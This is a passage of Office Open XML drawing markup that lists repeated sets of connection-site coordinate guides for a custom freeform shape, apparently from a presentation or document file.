              <a:gd name="connsiteY0" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1834080 h 1858154"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1820983 h 1858154"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1745922 h 1858154"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1706043 h 1858154"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1696181 h 1858154"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1649683 h 1858154"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1598895 h 1858154"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1448852 h 1858154"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1327025 h 1858154"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1264472 h 1858154"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1217376 h 1858154"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1158396 h 1858154"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1076277 h 1858154"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1012022 h 1858154"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 956092 h 1858154"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 892073 h 1858154"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 744029 h 1858154"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 308584 h 1858154"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 230996 h 1858154"/>
              <a:gd name="connsiteX23" fmla="*/ 8361738 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 266841 h 1858154"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 155189 h 1858154"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 245 h 1858154"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 15088 h 1873242"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1873242 h 1873242"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1873242 h 1873242"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1849168 h 1873242"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1836071 h 1873242"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1761010 h 1873242"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1721131 h 1873242"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1711269 h 1873242"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1664771 h 1873242"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1613983 h 1873242"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1463940 h 1873242"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1342113 h 1873242"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1279560 h 1873242"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1232464 h 1873242"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1173484 h 1873242"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1091365 h 1873242"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1027110 h 1873242"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 971180 h 1873242"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 907161 h 1873242"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 894129 h 1873242"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 759117 h 1873242"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 323672 h 1873242"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 246084 h 1873242"/>
              <a:gd name="connsiteX23" fmla="*/ 8361738 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 281929 h 1873242"/>
              <a:gd name="connsiteX24" fmla="*/ 8832027 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 47539 h 1873242"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 15333 h 1873242"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 15088 h 1873242"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 15088 h 1873242"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1873242 h 1873242"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1873242 h 1873242"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1849168 h 1873242"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1836071 h 1873242"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1761010 h 1873242"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1721131 h 1873242"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1711269 h 1873242"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1664771 h 1873242"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1613983 h 1873242"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1463940 h 1873242"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1342113 h 1873242"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1279560 h 1873242"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1232464 h 1873242"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1173484 h 1873242"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1091365 h 1873242"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1027110 h 1873242"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 971180 h 1873242"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 907161 h 1873242"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 894129 h 1873242"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 759117 h 1873242"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 323672 h 1873242"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 246084 h 1873242"/>
              <a:gd name="connsiteX23" fmla="*/ 8459929 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 159190 h 1873242"/>
              <a:gd name="connsiteX24" fmla="*/ 8832027 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 47539 h 1873242"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 15333 h 1873242"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 15088 h 1873242"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1887003 h 1911077"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1873906 h 1911077"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1798845 h 1911077"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1758966 h 1911077"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1749104 h 1911077"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1702606 h 1911077"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1651818 h 1911077"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1501775 h 1911077"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1379948 h 1911077"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1317395 h 1911077"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1270299 h 1911077"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1211319 h 1911077"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1129200 h 1911077"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1064945 h 1911077"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1009015 h 1911077"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 944996 h 1911077"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 931964 h 1911077"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 796952 h 1911077"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 361507 h 1911077"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 283919 h 1911077"/>
              <a:gd name="connsiteX23" fmla="*/ 8459929 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 197025 h 1911077"/>
              <a:gd name="connsiteX24" fmla="*/ 8930218 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 36279 h 1911077"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 53168 h 1911077"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1887003 h 1911077"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1873906 h 1911077"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1798845 h 1911077"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1758966 h 1911077"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1749104 h 1911077"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1702606 h 1911077"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1651818 h 1911077"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1501775 h 1911077"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1379948 h 1911077"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1317395 h 1911077"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1270299 h 1911077"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1211319 h 1911077"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1129200 h 1911077"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1064945 h 1911077"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1009015 h 1911077"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 944996 h 1911077"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 931964 h 1911077"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 796952 h 1911077"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 361507 h 1911077"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 283919 h 1911077"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 172477 h 1911077"/>
              <a:gd name="connsiteX24" fmla="*/ 8930218 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 36279 h 1911077"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 53168 h 1911077"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1887003 h 1911077"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1873906 h 1911077"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1798845 h 1911077"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1758966 h 1911077"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1749104 h 1911077"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1702606 h 1911077"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1651818 h 1911077"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1501775 h 1911077"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1379948 h 1911077"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1317395 h 1911077"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1270299 h 1911077"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1211319 h 1911077"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1129200 h 1911077"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1064945 h 1911077"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1009015 h 1911077"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 944996 h 1911077"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 931964 h 1911077"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 796952 h 1911077"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 361507 h 1911077"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 283919 h 1911077"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 172477 h 1911077"/>
              <a:gd name="connsiteX24" fmla="*/ 8930218 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 36279 h 1911077"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 53168 h 1911077"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1887003 h 1911077"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1873906 h 1911077"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1798845 h 1911077"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1758966 h 1911077"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1749104 h 1911077"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1702606 h 1911077"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1651818 h 1911077"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1501775 h 1911077"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1379948 h 1911077"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1317395 h 1911077"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1270299 h 1911077"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1211319 h 1911077"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1129200 h 1911077"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1064945 h 1911077"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1009015 h 1911077"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 944996 h 1911077"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 796952 h 1911077"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 796952 h 1911077"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 361507 h 1911077"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 283919 h 1911077"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 172477 h 1911077"/>
              <a:gd name="connsiteX24" fmla="*/ 8930218 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 36279 h 1911077"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 53168 h 1911077"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX0" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2275937 h 2300011"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2262840 h 2300011"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2187779 h 2300011"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2147900 h 2300011"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2138038 h 2300011"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 2091540 h 2300011"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 2040752 h 2300011"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1890709 h 2300011"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1768882 h 2300011"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1706329 h 2300011"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1659233 h 2300011"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1600253 h 2300011"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1518134 h 2300011"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1453879 h 2300011"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1397949 h 2300011"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1333930 h 2300011"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
